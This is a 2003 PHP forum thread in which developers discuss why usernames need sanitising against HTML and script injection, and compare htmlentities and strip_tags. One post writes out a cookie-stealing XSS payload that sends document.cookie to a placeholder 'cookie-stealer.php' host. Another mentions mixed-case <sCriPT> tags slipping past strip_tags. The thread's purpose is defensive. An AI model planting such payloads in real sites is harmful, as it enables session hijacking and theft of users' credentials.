Why do people code so complicatedly?

Nixon · 2003-09-30T21:37:35+00:00

Hey all. I always seem to look at peoples code for simple things such as log-in scripts and I always think how ridiculously long they are. I don't understand...

Why do people code so complicatedly?

dustbuster

Originally posted by stolzyboy
look at the bottom of this forum, all the usernames...
well what if you let them use <img src=http://www.whateverdomain.com/nastypicture.jpg>

well then when you echo $username

instead of seeing: stolzyboy
you could see: nasty picture

catch my drift...

always sanitize your code...whether you think it may/may not hurt you in the end, better to be safe than sorry...

I realize that when setting up users one should sanitize the information. I was wondering why one would need to sanitize the information for the username in the code given at the beginning of this thread.

stolzyboy

Originally posted by dustbuster
I realize that when setting up users one should sanitize the information. I was wondering why one would need to sanitize the information for the username in the code given at the beginning of this thread.

in THAT instance it may not matter depending, but things like <, ", ', etc... that are/can be in html tags may screw up your sql statement...

dustbuster

Okay thanks

steadyguy

Probably a greater danger of HTML in usernames is the <script> tag ... with a line or two of JavaScript or VBScript an attacker could do all sorts of damage from trivial to downright dastardly.

stolzyboy

Originally posted by steadyguy
Probably a greater danger of HTML in usernames is the <script> tag ... with a line or two of JavaScript or VBScript an attacker could do all sorts of damage from trivial to downright dastardly.

ermmm.... moot point to me, an attacker isn't gonna piss with client side scripting to hammer your server, he'll find other ways into your box, but people can pissy with your site using html tags, on the other hand, yes someone could use an alert or something of that affect, but it isn't going to hurt your server, just your pride...

steadyguy

Originally posted by stolzyboy
... an attacker isn't gonna piss with client side scripting to hammer your server, he'll find other ways into your box, but people can pissy with your site using html tags, on the other hand, yes someone could use an alert or something of that affect, but it isn't going to hurt your server, just your pride...

You assume that an attacker has only one motivation: to hurt/disable/damage your server in some way. What if s/he doesn't care about your server? But instead wants to simply hurt/destroy your business or your site's reputation, or maybe they just like playing with people's minds or enjoy the sense of power it gives them. In any case, these are serious privacy violations, and in many countries, also criminal acts.

A couple examples: an attacker might try to turn away site users (via an offensive or deceptive popup dialog, or 'unclosable' windows, or infinitely spawning windows). Or they might redirect visitors to an offensive, or maybe worse, a spoof site (and then use unwary users' passwords to gain 'legitimate' access, steal their credit card numbers or personal information). Or, since most users use IE, they could spread a VBScript virus, or ... I'm positive there's lots more stuff that I've haven't thought of. But it's always the stuff you haven't thought of that bites you in the @ss ...

keith73

Originally posted by stolzyboy
ermmm.... moot point to me, an attacker isn't gonna piss with client side scripting to hammer your server, he'll find other ways into your box, but people can pissy with your site using html tags, on the other hand, yes someone could use an alert or something of that affect, but it isn't going to hurt your server, just your pride...

actually, it could hurt your server by causing it to repeatedly open up a page on your site in new windows. Not everyone uses pop-up blocking.
They may be able to launch some form of DoS attack as well, have some script that constantly sends requests to one of the scripts on your site.

As for the original poster, I agree that some people write their code so unnecessarily complex, but not for the reasons you posted. I've debugged my predecessor's code and found numerous flaws in not only his code, but his logic as well. He'd often use preg_match when a simple split would do. He'd have multiple queries where 1 query with a left join would do. Using the same code over and over when instead of writing a function.

That's the kind of stuff that drives me crazy.

keith

stolzyboy

Originally posted by steadyguy
You assume that an attacker has only one motivation: to hurt/disable/damage your server in some way. What if s/he doesn't care about your server? But instead wants to simply hurt/destroy your business or your site's reputation, or maybe they just like playing with people's minds or enjoy the sense of power it gives them. In any case, these are serious privacy violations, and in many countries, also criminal acts.

all of which can be done with html tags, and ya know, <script> is an html tag...

stolzyboy

Originally posted by keith73
They may be able to launch some form of DoS attack as well, have some script that constantly sends requests to one of the scripts on your site.

yep, they could but DoS attacks are accomplished much easier than that method and a little sneakier so you don't know til it's too late...

Weedpacket

Originally posted by steadyguy
I'm positive there's lots more stuff that I've haven't thought of. But it's always the stuff you haven't thought of that bites you in the @ss ...

I've seen for instance one site which had a section at the bottom for people to post messages. Someone added <script> that rewrote all of the page's links to point to porn sites.

stolzyboy

Originally posted by Weedpacket
I've seen for instance one site which had a section at the bottom for people to post messages. Someone added <script> that rewrote all of the page's links to point to porn sites.

now that would be funny...

Merve

Yeah so use htmlentities()....😃 (I always say that).

keith73

why use htmlentities? Just use strip_tags and take the tags out all together. Tags have no business being part of a username.

keith

Moonglobe

Originally posted by keith73
why use htmlentities? Just use strip_tags and take the tags out all together. Tags have no business being part of a username.

keith [/B]

he's got a point there Merve.....😃

drawmack

one of the nastiest things I ever heard of was someone put a javascript in that redirected user's to a page that looked exactly like the target site's log in page. Then he grabbed their username and password, used the original site's php to validate the person against the database using fsockopen and parsing the response. Then if they successfully logged in he grabbed their username and passord while redirecting them back to the originalting site. No one was the wiser until he stole a bunch of cc numbers with the grabbed info.

jayant

one way is to grab the cookie and decode the stuff in the cookie to get username,password, other personal info of the [erson currently logged in.

and then the person redirects you to some other page/site. you wont even know that ur cookie was stolen, which might have lots of sensitive info.

Moonglobe

Originally posted by jayant
one way is to grab the cookie and decode the stuff in the cookie to get username,password, other personal info of the [erson currently logged in.

<script>window.location='somesite/cookie-stealer.php?cookie='+document.cookie</script>

and then the person redirects you to some other page/site. you wont even know that ur cookie was stolen, which might have lots of sensitive info.

If it does, then you should never visit the site you were trying to visit again. who would be stupid enough to put everything in a cookie?

steadyguy

Originally posted by keith73
why use htmlentities? Just use strip_tags and take the tags out all together. Tags have no business being part of a username.

keith [/B]

strip_tags() is great, but you have to be careful ... apparently it doesn't take out mixed case tags. Ie., <sCriPT> ...

stolzyboy

Originally posted by steadyguy
strip_tags() is great, but you have to be careful ... apparently it doesn't take out mixed case tags. Ie., <sCriPT> ...

yep, and if you read the notes at the manual for [man]strip_tags[/man] there are many solutions to get around it, and is supposedly supposed to be fixed in PHP5

tekky

Originally posted by steadyguy
strip_tags() is great, but you have to be careful ... apparently it doesn't take out mixed case tags. Ie., <sCriPT> ...

strtolower() usernames have no business being mixed case IMO :p